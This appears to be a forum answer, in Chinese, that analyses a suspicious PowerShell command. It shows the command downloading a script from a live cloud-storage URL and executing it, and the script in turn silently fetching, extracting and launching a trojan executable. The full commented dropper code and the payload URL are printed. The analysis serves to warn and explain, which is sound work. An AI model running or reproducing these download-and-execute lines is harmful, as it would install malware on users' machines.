这个命令提示符输入起什么作用？

为了帮助您了解该命令正在做什么，并可能帮助未来遇到类似问题的读者，这确实是在下载并执行木马。

您可以通过简单的步骤来确定这一点，首先使用以下命令检查 URL 内容Invoke-RestMethod：

Invoke-RestMethod https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt

您将看到内容是 PowerShell 脚本。紧接着，您可以run.zip在脚本顶部看到可疑内容，如果您将.zipURL 粘贴到https://www.virustotal.com/中，则可以看到它确实是恶意的：

添加注释来了解代码的作用：

# defines download file
$zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
# defines destination file for the zip
$qbrw = "$env:APPDATA\file_azlm5.zip"
# defines destination folder for the zip
$lpmk = "$env:APPDATA\Install_4278"
# defines destination path for the extracted `.exe` from this zip
$vkdy = Join-Path $lpmk 'spPortableRun.exe'

# if the destination folder doesnt exist
if (!(Test-Path $lpmk)) {
    # creates it
    New-Item -Path $lpmk -ItemType Directory
}

try {
    # tries to download `run.zip` to destination file `file_azlm5.zip`
    $ghwd = New-Object System.Net.WebClient
    $ghwd.DownloadFile($zxty, $qbrw)
}
catch {
    exit
}

try {
    Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
    # extract the downloaded zip to destination folder `Install_4278`
    [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
    # and delete the zip file
    Remove-Item $qbrw -Force
}
catch {
    exit
}

try {
    # starts the trojan extracted from the zip file
    # (should've been `spPortableRun.exe` in `Install_4278` folder)
    Start-Process -FilePath $vkdy -WindowStyle Hidden
}
catch {
    exit
}

总结一下，-Command您将执行：

# defines content URL
$rQd = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'
# creates a WebClient object
$pLs = New-Object System.Net.WebClient
# download the string content
# (this is pretty much like using `Invoke-RestMethod`)
$sLf = $pLs.DownloadString($rQd)
# `Invoke-Expression` here invokes the PowerShell script
# embedded in the string content 
Invoke-Expression $sLf